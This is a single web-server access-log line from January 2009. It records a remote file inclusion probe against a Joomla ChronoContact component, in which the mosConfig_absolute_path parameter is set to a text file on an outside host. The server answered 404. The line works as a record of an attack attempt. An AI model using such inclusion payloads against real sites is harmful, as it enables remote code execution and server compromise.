67.19.89.98 - - [04/Jan/2009:09:33:38 -0800] "GET /administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://owell.us/var/https/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
